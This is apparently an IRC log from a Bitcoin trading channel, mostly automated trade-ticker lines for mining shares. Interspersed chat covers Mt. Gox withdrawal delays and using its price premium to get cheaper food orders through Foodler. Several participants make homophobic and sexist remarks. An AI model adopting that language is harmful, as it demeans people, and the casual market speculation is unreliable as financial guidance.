[TAT.ASICMINER] 67 @ 0.03186 = 2.1346 BTC [-] Aug 21 17:27:36 [BTCTC] [TAT.ASICMINER] 12 @ 0.03188 = 0.3826 BTC [+] Aug 21 17:27:37 [BTCTC] [TAT.ASICMINER] 21 @ 0.03189 = 0.6697 BTC [+] Aug 21 17:27:48 i guess :) Aug 21 17:27:49 [BTCTC] [DMS.MINING] 100 @ 0.00333 = 0.333 BTC [+] Aug 21 17:27:50 [BTCTC] [LABCOIN] 647 @ 0.00222 = 1.4363 BTC [-] Aug 21 17:27:51 [BTCTC] [BASIC-MINING] 1 @ 0.254 BTC [-] Aug 21 17:27:52 [BTCTC] [LABCOIN] 95 @ 0.00222 = 0.2109 BTC [-] Aug 21 17:27:54 [BTCTC] [LABCOIN] 825 @ 0.00221 = 1.8233 BTC [-] Aug 21 17:27:56 [BTCTC] [LABCOIN] 500 @ 0.002202 = 1.101 BTC [-] Aug 21 17:27:57 [BTCTC] [LABCOIN] 100 @ 0.002202 = 0.2202 BTC [-] Aug 21 17:27:59 [BTCTC] [LABCOIN] 2500 @ 0.0022 = 5.5 BTC [-] Aug 21 17:27:59 [BTCTC] [LABCOIN] 1000 @ 0.0022 = 2.2 BTC [-] Aug 21 17:28:00 [BTCTC] [LABCOIN] 500 @ 0.0022 = 1.1 BTC [-] Aug 21 17:28:02 [BTCTC] [LABCOIN] 5000 @ 0.0022 = 11 BTC [-] Aug 21 17:28:15 [BTCTC] [TAT.ASICMINER] 4 @ 0.03187 = 0.1275 BTC [-] Aug 21 17:28:16 [BTCTC] [LABCOIN] 10 @ 0.002255 = 0.0226 BTC [+] Aug 21 17:28:18 [BTCTC] [TAT.ASICMINER] 21 @ 0.03188 = 0.6695 BTC [+] Aug 21 17:28:34 [BTCTC] [ASICMINER-PT] 1 @ 3.39 BTC [-] Aug 21 17:28:41 [HAVELOCK] [XBOND] 1000 @ 0.00115 = 1.15 BTC [+] Aug 21 17:28:47 [BTCTC] [BASIC-MINING] 3 @ 0.254 = 0.762 BTC [-] Aug 21 17:28:49 [BTCTC] [BASIC-MINING] 16 @ 0.253 = 4.048 BTC [-] Aug 21 17:28:51 [BTCTC] [BASIC-MINING] 10 @ 0.252 = 2.52 BTC [-] Aug 21 17:28:51 [BTCTC] [BASIC-MINING] 55 @ 0.252 = 13.86 BTC [-] Aug 21 17:28:53 [BTCTC] [BASIC-MINING] 25 @ 0.25 = 6.25 BTC [-] Aug 21 17:29:07 [BTCTC] [TAT.ASICMINER] 46 @ 0.03188 = 1.4665 BTC [+] Aug 21 17:30:08 [BTCTC] [ASICMINER-PT] 2 @ 3.37 = 6.74 BTC [-] Aug 21 17:30:10 [BTCTC] [ASICMINER-PT] 2 @ 3.384 = 6.768 BTC [+] Aug 21 17:30:12 [BTCTC] [ASICMINER-PT] 1 @ 3.388 BTC [+] Aug 21 17:30:13 [BTCTC] [ASICMINER-PT] 2 @ 3.389 = 6.778 BTC [+] Aug 21 17:30:17 wow Aug 21 17:30:26 Now those buys dont make sens Aug 21 17:30:27 misread that Aug 21 17:30:29 thats someone chasing Aug 21 17:30:38 Thought it said, 3.89 Aug 21 17:30:41 [BTCTC] [ASICMINER-PT] 1 @ 3.389 BTC [+] Aug 21 17:30:43 [BTCTC] [ASICMINER-PT] 5 @ 3.39 = 16.95 BTC [+] Aug 21 17:30:51 it looked like it was at 2.9 a min ago Aug 21 17:30:58 someone buy a crap ton of AM? Aug 21 17:31:06 Wouldn't say a crap ton Aug 21 17:31:09 <75BTC worth Aug 21 17:31:15 markets super thin Aug 21 17:31:27 ystarnaud yes, 10btc worth. Aug 21 17:31:29 [BTCTC] [TAT.ASICMINER] 58 @ 0.03186 = 1.8479 BTC [-] Aug 21 17:31:29 [BTCTC] [COGNITIVE] 1 @ 0.3162 BTC [-] Aug 21 17:31:56 and it was trading 2.6 or some shit. Aug 21 17:32:06 ahh Aug 21 17:32:06 [BTCTC] [TAT.ASICMINER] 9 @ 0.03186 = 0.2867 BTC [-] Aug 21 17:32:07 [BTCTC] [TAT.ASICMINER] 3 @ 0.03186 = 0.0956 BTC [-] Aug 21 17:32:33 [BTCTC] [LABCOIN] 500 @ 0.0007 = 0.35 BTC [-] Aug 21 17:32:34 [BTCTC] [TAT.ASICMINER] 33 @ 0.03297 = 1.088 BTC [+] Aug 21 17:32:37 [BTCTC] [LABCOIN] 5 @ 0.002245 = 0.0112 BTC [+] Aug 21 17:32:42 [BTCTC] [LABCOIN] 15 @ 0.002245 = 0.0337 BTC [+] Aug 21 17:32:44 [BTCTC] [LABCOIN] 250 @ 0.002317 = 0.5793 BTC [+] Aug 21 17:32:45 [BTCTC] [LABCOIN] 4312 @ 0.002318 = 9.9952 BTC [+] Aug 21 17:32:46 [BTCTC] [LABCOIN] 57 @ 0.002342 = 0.1335 BTC [+] Aug 21 17:32:47 [BTCTC] [LABCOIN] 366 @ 0.002343 = 0.8575 BTC [+] Aug 21 17:33:30 [BTCTC] [TAT.ASICMINER] 67 @ 0.03296 = 2.2083 BTC [-] Aug 21 17:33:31 [BTCTC] [TAT.ASICMINER] 12 @ 0.03297 = 0.3956 BTC [+] Aug 21 17:33:32 [BTCTC] [TAT.ASICMINER] 29 @ 0.03298 = 0.9564 BTC [+] Aug 21 17:34:29 [BTCTC] [TAT.ASICMINER] 13 @ 0.03296 = 0.4285 BTC [-] Aug 21 17:34:30 [BTCTC] [TAT.ASICMINER] 67 @ 0.03297 = 2.209 BTC [+] Aug 21 17:34:31 [BTCTC] [TAT.ASICMINER] 117 @ 0.03299 = 3.8598 BTC [+] Aug 21 17:35:26 [BTCTC] [TAT.ASICMINER] 3 @ 0.03298 = 0.0989 BTC [-] Aug 21 17:35:55 guess the divs were like half of last week and people decided to panic sell AM lol Aug 21 17:36:08 That's a silly reason Aug 21 17:36:13 weak hands Aug 21 17:36:31 [HAVELOCK] [AM100] 1 @ 0.0295 BTC [-] Aug 21 17:36:34 [BTCTC] [TAT.ASICMINER] 67 @ 0.03288 = 2.203 BTC [-] Aug 21 17:36:41 [BTCTC] [TAT.ASICMINER] 40 @ 0.0329 = 1.316 BTC [+] Aug 21 17:36:45 [BTCTC] [TAT.ASICMINER] 29 @ 0.03299 = 0.9567 BTC [+] Aug 21 17:36:55 [HAVELOCK] [AM100] 10 @ 0.0295 = 0.295 BTC [-] Aug 21 17:37:43 perfect timing.. a am reseller advertises on /r/bitcoin http://www.bitcanary.com/ Aug 21 17:38:07 now i'm sad Aug 21 17:38:53 http://blockchain.info/charts/hash-rate Aug 21 17:38:54 Bitcoin Hash Rate Aug 21 17:41:00 looks like 300m in 2 months Aug 21 17:41:13 That's pretty intense Aug 21 17:41:26 [BTCTC] [TAT.ASICMINER] 67 @ 0.03299 = 2.2103 BTC [+] Aug 21 17:41:57 really, i won't go below that for idiff-e october Aug 21 17:41:59 looks like a perfect exponential Aug 21 17:42:14 yes, switch to log scale Aug 21 17:42:23 [BTCTC] [TAT.ASICMINER] 200 @ 0.033 = 6.6 BTC [+] Aug 21 17:44:08 [HAVELOCK] [AM100] 15 @ 0.0292 = 0.438 BTC [-] Aug 21 17:44:14 http://bitcoin.sipa.be/speed.png much better Aug 21 17:44:26 [HAVELOCK] [AM100] 3 @ 0.0292 = 0.0876 BTC [-] Aug 21 17:44:30 polynomial until beginning of this year Aug 21 17:45:39 hey all Aug 21 17:45:44 anyone have a gox account? Aug 21 17:45:55 hi mjr_1, i do Aug 21 17:46:00 hey jurov Aug 21 17:46:08 how are you? Aug 21 17:46:09 but not ysed it for year Aug 21 17:46:12 ah Aug 21 17:46:22 [BTCTC] [TAT.ASICMINER] 67 @ 0.03312 = 2.219 BTC [+] Aug 21 17:46:23 [BTCTC] [TAT.ASICMINER] 8 @ 0.03312 = 0.265 BTC [+] Aug 21 17:46:24 i have one Aug 21 17:46:25 i really want to know from someone who is on gox what the deal is with USD withdrawal Aug 21 17:46:28 or two Aug 21 17:46:53 [BTCTC] [ASICMINER-PT] 1 @ 3.347 BTC [-] Aug 21 17:46:55 cant tell cause i dont use their banks Aug 21 17:47:01 mjr_1: i'm fine. and doing this: http://satoshi.sk/square Aug 21 17:47:11 [HAVELOCK] [AM100] 17 @ 0.0292 = 0.4964 BTC [-] Aug 21 17:47:23 very nice! Aug 21 17:47:27 [BTCTC] [ASICMINER-PT] 1 @ 3.348 BTC [+] Aug 21 17:47:31 [HAVELOCK] [AM100] 20 @ 0.0295 = 0.59 BTC [+] Aug 21 17:47:44 [HAVELOCK] [AM100] 1 @ 0.0295 BTC [+] Aug 21 17:47:50 wow looks nice Aug 21 17:48:05 i need to get my site up! Aug 21 17:48:05 looks a bit gay Aug 21 17:48:08 hhehehe Aug 21 17:48:13 what up kakobrekla Aug 21 17:48:27 lol, not done by me Aug 21 17:48:39 not much mjr_1, another day another dollar Aug 21 17:48:40 [BTCTC] [ASICMINER-PT] 1 @ 3.36 BTC [+] Aug 21 17:48:42 err i mean bitcoin Aug 21 17:48:45 hehehe Aug 21 17:48:51 so, the main question is... Aug 21 17:48:56 can people get dollars from gox Aug 21 17:49:06 i'm not saying immediately Aug 21 17:49:12 i'm saying at all Aug 21 17:49:19 if the answer is "no" Aug 21 17:49:29 i only heard some evidence about sepa transfers to czech rep "oh it took only a month, not so bad" Aug 21 17:49:31 i think the answer is 'yes with delays' for the moment Aug 21 17:49:38 ok Aug 21 17:49:42 that is what i wanted to know Aug 21 17:49:46 because i found something interesting Aug 21 17:49:51 i order most of my food Aug 21 17:49:56 so i found Foodler Aug 21 17:50:00 [BTCTC] [LABCOIN] 30 @ 0.002276 = 0.0683 BTC [-] Aug 21 17:50:08 they will give you the mt. gox price for bitcoins Aug 21 17:50:26 so if i buy on bitstamp, and then put coins into foodler, i get ~15% free food Aug 21 17:50:33 INteresting. Aug 21 17:50:33 dude thats pretty cool Aug 21 17:50:34 [BTCTC] [ASICMINER-PT] 1 @ 3.45 BTC [+] Aug 21 17:50:42 well... Aug 21 17:50:43 lol, so you wonder how they do it? Aug 21 17:50:48 there are other ways of "cashing out" Aug 21 17:50:51 yes Aug 21 17:50:52 maybe they deliver to mtgox, too Aug 21 17:50:58 [BTCTC] [ASICMINER-PT] 1 @ 3.45 BTC [+] Aug 21 17:50:59 [BTCTC] [TAT.ASICMINER] 100 @ 0.0332 = 3.32 BTC [+] Aug 21 17:51:01 [BTCTC] [TAT.ASICMINER] 25 @ 0.0332 = 0.83 BTC [+] Aug 21 17:51:01 do you fund the Foddler account then make purchases from it? or do you send btc from your wallet for each individual purchase Aug 21 17:51:02 i don't want to screw over this company by advertising that Aug 21 17:51:02 [BTCTC] [TAT.ASICMINER] 7 @ 0.0331 = 0.2317 BTC [-] Aug 21 17:51:03 lol mjr_1 nice catch Aug 21 17:51:15 [BTCTC] [TAT.ASICMINER] 12 @ 0.0335 = 0.402 BTC [+] Aug 21 17:51:17 [BTCTC] [ASICMINER-PT] 1 @ 3.401 BTC [-] Aug 21 17:51:18 i typically send a coin to foodler Aug 21 17:51:20 i knew you werent in finance for nothing Aug 21 17:51:24 hehehe Aug 21 17:51:33 but, you can alternatively look at it this way... Aug 21 17:51:41 i am getting a discount on all my food... Aug 21 17:51:46 AND if many people do this Aug 21 17:51:48 [HAVELOCK] [XBOND] 1000 @ 0.00115 = 1.15 BTC [+] Aug 21 17:51:51 foodler is gaining market share Aug 21 17:51:58 [BTCTC] [ACTIVEMINING] 30 @ 0.005161 = 0.1548 BTC [+] Aug 21 17:52:00 [BTCTC] [ACTIVEMINING] 6 @ 0.005162 = 0.031 BTC [+] Aug 21 17:52:16 [BTCTC] [ACTIVEMINING] 30 @ 0.005163 = 0.1549 BTC [+] Aug 21 17:52:17 [BTCTC] [ACTIVEMINING] 214 @ 0.005162 = 1.1047 BTC [-] Aug 21 17:52:18 IF they can get dollars out of gox (delays don't matter, real businesses use accounts receivable and deliverable and handle cash flow issues) Aug 21 17:52:18 [BTCTC] [ACTIVEMINING] 656 @ 0.0051 = 3.3456 BTC [-] Aug 21 17:52:43 [BTCTC] [ASICMINER-PT] 2 @ 3.401 = 6.802 BTC [-] Aug 21 17:52:43 then it is a GREAT way for a business to expand...you can offer a discount to your customers that doesn't cost you anything Aug 21 17:53:00 [BTCTC] [ASICMINER-PT] 5 @ 3.4 = 17 BTC [-] Aug 21 17:53:06 you leverage your ability to handle short term cash flow while waiting for wire from gox Aug 21 17:53:12 and use economies of scale Aug 21 17:53:34 [BTCTC] [ASICMINER-PT] 1 @ 3.478 BTC [+] Aug 21 17:53:37 [BTCTC] [LABCOIN] 30 @ 0.002265 = 0.068 BTC [-] Aug 21 17:53:37 maybe they just dont know the gox issues yet Aug 21 17:53:38 [BTCTC] [LABCOIN] 1 @ 0.002266 BTC [+] Aug 21 17:53:39 [BTCTC] [LABCOIN] 1 @ 0.002277 BTC [+] Aug 21 17:53:40 [BTCTC] [LABCOIN] 20 @ 0.002278 = 0.0456 BTC [+] Aug 21 17:53:40 [BTCTC] [LABCOIN] 11 @ 0.002342 = 0.0258 BTC [+] Aug 21 17:53:43 but if i were to tell people who never used bitcoin, "oh, i pay 15% less for all the food I order, because of bitcoin) they may adopt bitcoin JUST for that reason Aug 21 17:54:05 the only problem is if foodler can't get cash EVER out of gox, in which case they are getting screwed Aug 21 17:54:16 and then bitcoin will end up as the bad one as 'you cant get usd back ever again, dont use it' Aug 21 17:54:21 [HAVELOCK] [AM100] 55 @ 0.0291 = 1.6005 BTC [-] Aug 21 17:54:26 they may cease to accept it Aug 21 17:54:34 serve as cautionary tale to other businesses Aug 21 17:54:47 through no fault of bitcoin, but rather through advertising prices you can't really use Aug 21 17:54:50 maybe they will be interested in marketmaking pizza options with physical delivery? Aug 21 17:54:58 hehehe ^^^^ YES Aug 21 17:55:09 or they will use bitpay Aug 21 17:55:11 or whatever Aug 21 17:55:23 [BTCTC] [ASICMINER-PT] 2 @ 3.4 = 6.8 BTC [-] Aug 21 17:55:30 true...but they would take a 15% loss Aug 21 17:55:36 and i doubt their margins are even that high Aug 21 17:55:41 bitpay takes 15%? Aug 21 17:55:49 oh Aug 21 17:55:54 their prices are not gox prices? Aug 21 17:56:03 no, it's 106 atm Aug 21 17:56:06 no...if they have accepted bitcoins and given gox price in dollars then have to sell at bitstamp prices... Aug 21 17:56:12 sbjf> looks like a perfect exponential << exactly. Aug 21 17:56:15 they have subsidized my food buying Aug 21 17:56:31 maybe they expect to sell bitcoins later when it's 15% up Aug 21 17:56:38 yes true Aug 21 17:56:39 [BTCTC] [ASICMINER-PT] 1 @ 3.381 BTC [-] Aug 21 17:57:09 if they are long term believers (and they don't seem to be using a payment processor, but rather are accepting bitcoins) then they may just figure its a good way to get a long position in bitcoin Aug 21 17:57:10 15% up lolwat bitcoin will never be over 32$ again! Aug 21 17:57:15 hahaha Aug 21 17:57:22 the only problem is if foodler can't get cash EVER out of gox, in which case they are getting screwed << something alojng those lines. Aug 21 17:57:41 try ot ask them directly? Aug 21 17:57:55 they might figure it out and he will lose the discount Aug 21 17:57:58 well, from what I've heard it is possible to get cash out of gox, it is just a time intensive process Aug 21 17:58:04 [BTCTC] [TAT.ASICMINER] 25 @ 0.0332 = 0.83 BTC [-] Aug 21 17:58:05 i don't mind losing the discount Aug 21 17:58:05 [BTCTC] [TAT.ASICMINER] 8 @ 0.03319 = 0.2655 BTC [-] Aug 21 17:58:10 Well there's a woot off Aug 21 17:58:10 if i get to keep the service Aug 21 17:58:14 cmon be more selfish Aug 21 17:58:17 hehehe Aug 21 17:58:40 kako he's prolly too lazy to return to rg ways Aug 21 17:58:46 like i said, a business can leverage its ability to put up with long delays from gox in order to offer MUCH better rate to attract more customers Aug 21 17:58:52 rg ways lol Aug 21 17:59:00 assuming that gox cash is eventually delivered Aug 21 17:59:11 many companies would pay money (and do) to expand market share... Aug 21 17:59:11 this isn't a business for the random pizza parlor. Aug 21 17:59:20 this is finance, should be done by finance people. Aug 21 17:59:23 they are not a random pizza parlor Aug 21 17:59:31 so far the cost of mtgox risk is about 15% on the spread. Aug 21 17:59:40 they are a payment processor similar to seamless Aug 21 17:59:43 ah. Aug 21 17:59:44 or grubhub Aug 21 17:59:49 well then why do you worry, it's their biz. Aug 21 17:59:52 so i can order food from anywhere Aug 21 17:59:55 either they do well or else they go under. Aug 21 17:59:56 i LOVE it Aug 21 17:59:57 yeah Aug 21 18:00:13 my point is, while it lasts, i am having my food ordering budget subsidized by gox Aug 21 18:00:27 [BTCTC] [ASICMINER-PT] 2 @ 3.38 = 6.76 BTC [-] Aug 21 18:00:29 lol Aug 21 18:00:30 for every $100 i put into my account, i can order $115 of food Aug 21 18:00:42 lol, tis a good idea Aug 21 18:00:47 and will be doing this :) Aug 21 18:00:51 awesome1 Aug 21 18:00:53 me too :) Aug 21 18:01:05 oh god, they are going under. Aug 21 18:01:05 my only point is, this could be AWESOME for them as a business, or could be TERRIBLE Aug 21 18:01:29 exactly...if word gets out, and they grow 10X as large Aug 21 18:01:34 they are magnifying a small problem Aug 21 18:01:48 but if they are aware, and are dealing with it, they are growing their business and doing really well Aug 21 18:01:50 [BTCTC] [DMS.MINING] 100 @ 0.00333 = 0.333 BTC [+] Aug 21 18:02:10 (i assume that bitcoin right now is a very small part of their total business) Aug 21 18:02:10 [BTCTC] [ACTIVEMINING] 1 @ 0.005253 BTC [+] Aug 21 18:02:22 seriously, if i post this on reddit Aug 21 18:02:32 [BTCTC] [ASICMINER-PT] 1 @ 3.441 BTC [+] Aug 21 18:02:33 [BTCTC] [ASICMINER-PT] 1 @ 3.442 BTC [+] Aug 21 18:02:34 [BTCTC] [ASICMINER-PT] 1 @ 3.443 BTC [+] Aug 21 18:02:35 [BTCTC] [ASICMINER-PT] 1 @ 3.444 BTC [+] Aug 21 18:02:37 [BTCTC] [ASICMINER-PT] 3 @ 3.445 = 10.335 BTC [+] Aug 21 18:02:38 [BTCTC] [ASICMINER-PT] 1 @ 3.458 BTC [+] Aug 21 18:02:39 [BTCTC] [ASICMINER-PT] 3 @ 3.459 = 10.377 BTC [+] Aug 21 18:02:39 [BTCTC] [ASICMINER-PT] 1 @ 3.46 BTC [+] Aug 21 18:02:40 [BTCTC] [ASICMINER-PT] 1 @ 3.479 BTC [+] Aug 21 18:02:41 [BTCTC] [ASICMINER-PT] 1 @ 3.481 BTC [+] Aug 21 18:02:42 [BTCTC] [ASICMINER-PT] 1 @ 3.482 BTC [+] Aug 21 18:02:43 [BTCTC] [ASICMINER-PT] 1 @ 3.483 BTC [+] Aug 21 18:02:44 [BTCTC] [ASICMINER-PT] 1 @ 3.484 BTC [+] Aug 21 18:02:45 [BTCTC] [ASICMINER-PT] 1 @ 3.485 BTC [+] Aug 21 18:02:46 [BTCTC] [ASICMINER-PT] 2 @ 3.5 = 7 BTC [+] Aug 21 18:02:48 [HAVELOCK] [AM100] 5 @ 0.03188888 = 0.1594 BTC [+] Aug 21 18:02:49 if they were publicly traded, it could tank their stock, or raise, depending on how good of a business person the person running it is Aug 21 18:02:50 [BTCTC] [ASICMINER-PT] 1 @ 3.5 BTC [+] Aug 21 18:03:04 [HAVELOCK] [AM100] 1 @ 0.0319 BTC [+] Aug 21 18:03:38 [BTCTC] [DMS.MINING] 37 @ 0.00333 = 0.1232 BTC [+] Aug 21 18:03:55 [HAVELOCK] [AM100] 20 @ 0.0319 = 0.638 BTC [+] Aug 21 18:04:10 [HAVELOCK] [AM100] 5 @ 0.0319 = 0.1595 BTC [+] Aug 21 18:04:13 [BTCTC] [DMS.MINING] 39 @ 0.00333 = 0.1299 BTC [+] Aug 21 18:04:34 [BTCTC] [DMS.MINING] 11 @ 0.00333 = 0.0366 BTC [+] Aug 21 18:04:36 [BTCTC] [LABCOIN] 30 @ 0.002279 = 0.0684 BTC [-] Aug 21 18:04:39 [BTCTC] [LABCOIN] 20 @ 0.002278 = 0.0456 BTC [-] Aug 21 18:04:41 [BTCTC] [LABCOIN] 1 @ 0.002265 BTC [-] Aug 21 18:04:42 [BTCTC] [LABCOIN] 155 @ 0.002222 = 0.3444 BTC [-] Aug 21 18:04:55 in other news...there was an interesting article which basically agreed that 15% is the risk premium at gox Aug 21 18:04:57 [HAVELOCK] [AM100] 23 @ 0.0319 = 0.7337 BTC [+] Aug 21 18:05:00 [BTCTC] [BTC-GROWTH] 5 @ 0.0972 = 0.486 BTC [-] Aug 21 18:05:01 (also TVM) Aug 21 18:05:19 but more interesting than that, it seems that gox MAY be a leading indicator at other exchanges Aug 21 18:05:38 so i'm very curious if you can use gox price in a bot in order to time the market on bitstamp Aug 21 18:05:51 it could as well be that the risk assesment is wrong Aug 21 18:06:24 would be funny that stamp gets shut down before gox dies Aug 21 18:06:35 HAHAHA Aug 21 18:06:45 that would probably kill me i would be laughing so hard Aug 21 18:06:53 better not to happen then :) Aug 21 18:06:56 [BTCTC] [TAT.ASICMINER] 10 @ 0.03327 = 0.3327 BTC [+] Aug 21 18:07:10 [BTCTC] [DMS.MINING] 100 @ 0.0033 = 0.33 BTC [-] Aug 21 18:07:28 [BTCTC] [ASICMINER-PT] 1 @ 3.408 BTC [-] Aug 21 18:07:50 [BTCTC] [LABCOIN] 6 @ 0.002233 = 0.0134 BTC [+] Aug 21 18:07:51 [BTCTC] [LABCOIN] 30 @ 0.002232 = 0.067 BTC [-] Aug 21 18:07:53 [BTCTC] [LABCOIN] 20 @ 0.002232 = 0.0446 BTC [-] Aug 21 18:07:54 [BTCTC] [LABCOIN] 4 @ 0.002228 = 0.0089 BTC [-] Aug 21 18:07:55 [BTCTC] [LABCOIN] 35 @ 0.002222 = 0.0778 BTC [-] Aug 21 18:08:55 [BTCTC] [DMS.MINING] 14 @ 0.0033 = 0.0462 BTC [-] Aug 21 18:09:12 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001301 BTC [-] Aug 21 18:09:27 [BTCTC] [DMS.MINING] 20 @ 0.003347 = 0.0669 BTC [+] Aug 21 18:09:41 [BTCTC] [DMS.MINING] 1 @ 0.0033 BTC [-] Aug 21 18:09:42 [BTCTC] [LABCOIN] 6 @ 0.002223 = 0.0133 BTC [+] Aug 21 18:10:29 [BTCTC] [DMS.MINING] 10 @ 0.003347 = 0.0335 BTC [+] Aug 21 18:10:39 [BTCTC] [BITVPS] 1 @ 0.002222 BTC [-] Aug 21 18:11:11 .d Aug 21 18:11:11 50810339.04828 | Next Diff in 597 blocks | Estimated Change: 25.1135% in 3d 2h 30m 17s Aug 21 18:11:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.03327 = 0.0665 BTC [+] Aug 21 18:11:27 [BTCTC] [DMS.MINING] 25 @ 0.003347 = 0.0837 BTC [+] Aug 21 18:12:15 [BTCTC] [S.MPOE-PT] 4 @ 0.0008601 = 0.0034 BTC [+] Aug 21 18:12:58 [BTCTC] [TAT.ASICMINER] 4 @ 0.03385 = 0.1354 BTC [+] Aug 21 18:13:50 [BTCTC] [KENILWORTH] 10 @ 0.001689 = 0.0169 BTC [+] Aug 21 18:13:54 https://www.youtube.com/watch?v=TGsBq0_kX84 Aug 21 18:13:56 [HAVELOCK] [AM100] 5 @ 0.03011 = 0.1506 BTC [-] Aug 21 18:13:58 [HAVELOCK] [AM100] 1 @ 0.0301 BTC [-] Aug 21 18:13:58 Introduction to Bitcoin and Bitstamp - YouTube Aug 21 18:14:43 [HAVELOCK] [KCIM] 1 @ 0.88 BTC [+] Aug 21 18:14:57 [BTCTC] [LABCOIN] 99 @ 0.002221 = 0.2199 BTC [-] Aug 21 18:15:12 [BTCTC] [BITVPS] 1 @ 0.002474 BTC [+] Aug 21 18:15:51 [BTCTC] [LABCOIN] 85 @ 0.002265 = 0.1925 BTC [+] Aug 21 18:15:52 [BTCTC] [LABCOIN] 30 @ 0.002266 = 0.068 BTC [+] Aug 21 18:15:54 [BTCTC] [LABCOIN] 2 @ 0.00227 = 0.0045 BTC [+] Aug 21 18:15:55 [BTCTC] [LABCOIN] 20 @ 0.002271 = 0.0454 BTC [+] Aug 21 18:15:56 [BTCTC] [LABCOIN] 5 @ 0.002272 = 0.0114 BTC [+] Aug 21 18:15:57 [BTCTC] [LABCOIN] 11 @ 0.002342 = 0.0258 BTC [+] Aug 21 18:15:58 [BTCTC] [LABCOIN] 93 @ 0.002343 = 0.2179 BTC [+] Aug 21 18:15:59 [BTCTC] [LABCOIN] 125 @ 0.002355 = 0.2944 BTC [+] Aug 21 18:15:59 [BTCTC] [LABCOIN] 1000 @ 0.002356 = 2.356 BTC [+] Aug 21 18:16:00 [BTCTC] [LABCOIN] 523 @ 0.002392 = 1.251 BTC [+] Aug 21 18:16:01 [BTCTC] [LABCOIN] 1190 @ 0.002393 = 2.8477 BTC [+] Aug 21 18:16:02 [BTCTC] [LABCOIN] 3000 @ 0.002394 = 7.182 BTC [+] Aug 21 18:16:04 [BTCTC] [LABCOIN] 12 @ 0.002399 = 0.0288 BTC [+] Aug 21 18:16:05 [BTCTC] [LABCOIN] 100 @ 0.0024 = 0.24 BTC [+] Aug 21 18:16:06 [BTCTC] [LABCOIN] 625 @ 0.002424 = 1.515 BTC [+] Aug 21 18:16:11 [HAVELOCK] [AM100] 50 @ 0.03 = 1.5 BTC [-] Aug 21 18:16:38 [BTCTC] [TAT.ASICMINER] 6 @ 0.0338 = 0.2028 BTC [-] Aug 21 18:16:50 better to make a video than to fix the trading engine Aug 21 18:16:52 obv. Aug 21 18:16:55 [HAVELOCK] [XBOND] 12 @ 0.00115 = 0.0138 BTC [+] Aug 21 18:17:30 [BTCTC] [TAT.ASICMINER] 67 @ 0.03382 = 2.2659 BTC [+] Aug 21 18:17:32 i bet they are macfags Aug 21 18:17:43 well thats unfair bet, i know they are. Aug 21 18:17:45 [BTCTC] [S.BBET-PT] 2 @ 0.00111 = 0.0022 BTC [-] Aug 21 18:18:09 [BTCTC] [ACTIVEMINING] 6 @ 0.005101 = 0.0306 BTC [-] Aug 21 18:18:11 [BTCTC] [ACTIVEMINING] 18 @ 0.0051 = 0.0918 BTC [-] Aug 21 18:18:45 [BTCTC] [TAT.MINIGAME] 10 @ 0.000235 = 0.0024 BTC [-] Aug 21 18:18:50 [BTCTC] [TAT.ASICMINER] 2 @ 0.03383 = 0.0677 BTC [+] Aug 21 18:18:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.0347 BTC [+] Aug 21 18:18:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.03479 BTC [+] Aug 21 18:19:22 where did your investigation into bitstamp sale end? Aug 21 18:19:45 [BTCTC] [NASTY-PT] 1 @ 0.003599 BTC [+] Aug 21 18:19:46 not clear Aug 21 18:20:13 they have/had 2 companies, bitstamp and bitstamp limited Aug 21 18:20:33 bitstamp got sold and bitstamp limited is in the uk Aug 21 18:20:38 [BTCTC] [S.BBET-PT] 655 @ 0.00111 = 0.7271 BTC [-] Aug 21 18:20:43 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001301 BTC [-] Aug 21 18:20:49 [HAVELOCK] [AM100] 50 @ 0.03 = 1.5 BTC [-] Aug 21 18:20:54 [HAVELOCK] [AM100] 1 @ 0.03166667 BTC [+] Aug 21 18:20:59 [HAVELOCK] [AM100] 125 @ 0.0295 = 3.6875 BTC [-] Aug 21 18:21:33 [BTCTC] [S.MPOE-PT] 10 @ 0.0008999 = 0.009 BTC [+] Aug 21 18:22:49 [BTCTC] [DMS.MINING] 1 @ 0.003345 BTC [-] Aug 21 18:23:44 [BTCTC] [TAT.ASICMINER] 44 @ 0.03474 = 1.5286 BTC [-] Aug 21 18:23:45 [BTCTC] [TAT.ASICMINER] 8 @ 0.03475 = 0.278 BTC [+] Aug 21 18:23:46 [BTCTC] [TAT.ASICMINER] 19 @ 0.03478 = 0.6608 BTC [+] Aug 21 18:23:47 [BTCTC] [TAT.ASICMINER] 9 @ 0.03478 = 0.313 BTC [+] Aug 21 18:25:42 [HAVELOCK] [SDSTM] 82 @ 0.0057 = 0.4674 BTC [+] Aug 21 18:25:52 i wish i was in slovenia Aug 21 18:25:57 [BTCTC] [ASICMINER-PT] 1 @ 3.484 BTC [+] Aug 21 18:25:58 [BTCTC] [ASICMINER-PT] 2 @ 3.485 = 6.97 BTC [+] Aug 21 18:26:56 you can come by any time Aug 21 18:27:02 [HAVELOCK] [SDSTM] 3 @ 0.0037 = 0.0111 BTC [-] Aug 21 18:27:05 [HAVELOCK] [SDSTM] 3 @ 0.0037 = 0.0111 BTC [-] Aug 21 18:27:18 [HAVELOCK] [SMG] 2 @ 0.00019 = 0.0004 BTC [-] Aug 21 18:27:34 they have nice ass in slovenia. Aug 21 18:27:36 btw panama not happening? Aug 21 18:27:40 if a little slovenly Aug 21 18:27:48 [HAVELOCK] [SMG] 93 @ 0.000189 = 0.0176 BTC [-] Aug 21 18:27:49 mp :p Aug 21 18:27:51 [HAVELOCK] [AM100] 4 @ 0.03166667 = 0.1267 BTC [+] Aug 21 18:27:54 [HAVELOCK] [AM100] 1 @ 0.0317 BTC [+] Aug 21 18:27:56 [HAVELOCK] [AM100] 5 @ 0.0317 = 0.1585 BTC [+] Aug 21 18:27:58 [HAVELOCK] [AM100] 41 @ 0.0319 = 1.3079 BTC [+] Aug 21 18:28:07 [HAVELOCK] [AM100] 1 @ 0.0333333 BTC [+] Aug 21 18:29:40 [BTCTC] [DMS.MINING] 1 @ 0.003345 BTC [-] Aug 21 18:29:42 [BTCTC] [DMS.MINING] 1 @ 0.003345 BTC [-] Aug 21 18:32:25 [BTCTC] [DMS.MINING] 412 @ 0.003347 = 1.379 BTC [+] Aug 21 18:32:25 [BTCTC] [DMS.MINING] 1000 @ 0.003347 = 3.347 BTC [+] Aug 21 18:32:27 [BTCTC] [ASICMINER-PT] 1 @ 3.481 BTC [-] Aug 21 18:32:49 [BTCTC] [DMS.MINING] 2400 @ 0.003348 = 8.0352 BTC [+] 